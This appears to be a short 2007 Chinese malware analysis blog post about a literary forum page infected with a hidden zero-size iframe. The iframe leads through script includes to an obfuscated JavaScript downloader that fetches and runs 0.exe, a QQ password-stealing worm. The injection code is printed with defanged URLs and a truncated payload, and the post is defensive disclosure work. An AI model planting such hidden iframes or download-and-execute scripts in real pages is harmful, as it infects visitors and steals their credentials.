文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe
endurer 原创
2007-08-31 第1版
检查发现网页中包含代码:
/---
<iframe src="hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907 包含代码:
/---
<script src=hxxp://www.y*oyo*5*9***.com/00.js></script>
1
2
3
<script src=hxxp://www.y*oyo*5*9***.com/11.js></script>
---/
00.js 内容为:
/---
eval("/146/165…(略)…/40/175")
---/
解密后的代码功能为 下载 hxxp://www.*down*8**9.com/0.exe,保存到 %windir%,文件名由自定义函数:
/---
function gn(tnV1) { var kUzRo2 = window["Math"]["random"]()*tnV1; return '.tmp'+'~tmp'; }
---/
生成,即~tmp.tmp,然后用 cmd.exe /c 来运行。
文件说明符 : d:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-31 19:3:13
修改时间 : 2007-8-31 19:3:22
访问时间 : 2007-8-31 0:0:0
大小 : 16944 字节 16.560 KB
MD5 : ceb6f4d04c9f5ff2f6636dd7233460d9
HSA1: 9F48898ECA47463712D65752C4AF0C072F200C8F
Kaspersky 报为 Worm.Win32.QQPass.a,瑞星 报为 Trojan.PSW.Win32.Agent.vcd
11.js 没有什么可疑的东东。
分享到:
相关推荐
手动移除方法 ...1、删除如下注册表项: [HKLM\SYSTEM\CurrentControlSet\Services\netsvcs] 2、从系统注册表项中删除如下所示"%System%\<rnd>.dll": [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost...
Net-Worm.Win32.Kido 专杀
delphi Email-Worm.Win32.Canbis
病毒Net-Worm.Win32.Kido.ih 清除方法
Win32/Conficker.AA ,也被称为W32/Worm.AHGV , Win32.Worm.Downadup ,净Worm.Win32.Kido.bg ,蠕虫: Win32/Conficker , W32/Conficker.worm.gen ,并末/ Conficker ,是一种恶意蠕虫病毒传播的电脑在当地的网络...
微软网站上不去 说明中毒了,可以用此工具杀一下
Worm.WhBoy
Worm.Win32.Opasoft.a,b,c,d I-Worm.Klez.a,e,f,g,h Win32.Elkern.c 程序先扫描内存,然后再扫描指定的路径。 若发现内存或文件被可感染局域网的病毒感染,程序会自动对局域网进行扫描。 [版本] ...
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
著名的bat.worm.muma,保存为txt格式
engine-worm.c
win32.parite.a 病毒,运行时,病毒会附加在Explorer.exe文件上以便驻留内存。 病毒会感染本地及其它可以访问的网络驱动器上的*.EXE和*.SCR文件。 直接格式化C盘是无济于事的,因为这个病毒会感染别的盘符下...
zoj 2499 The Happy Worm.md
win32.parite.a 病毒,运行时,病毒会附加在Explorer.exe文件上以便驻留内存。 病毒会感染本地及其它可以访问的网络驱动器上的*.EXE和*.SCR文件。 直接格式化C盘是无济于事的,因为这个病毒会感染别的...
IEXPLOREi.exe,Bi mat.exe是一类“文件夹图标病毒”,病毒体内有AutoIt字样,故许多杀毒软件命名为如Worm.Win32.AutoIt。这个病毒会在U盘等可存储介质生成Autorun.inf自运行文件,并指向同目录下IEXPLOREi.exe,并...
很多同学在实验室,微机室插U盘容易出现.exe文件夹病毒,原文件被病毒隐藏.下载这个文件解压到U盘,双击运行.然后删除.exe文件夹.最后用360或者AVAST或者NOD32右键U盘扫描一下,清除.autorun病毒即可.
Worm.Nimaya(熊猫烧香) 专杀工具最新版本:1.10
文件夹图标病毒专杀工具FolderCure更新到:V4.7Bulid20091001-1 Foldcure增加AI_Boy所破坏的文件夹与注册表的修复....MS32DLL.dll.exe..VBs Worm.Script.VBS.Autorun.a;svrhost.exe Backdoor.Win32.Gpigeon.dks等等
手机中毒后解决方法,我碰到中毒后,就是使用这个访求解决的。不知对你是否有帮助。
卡巴斯基黑名单验证助手;帮助你了解当前KEY是否已经被列入黑名单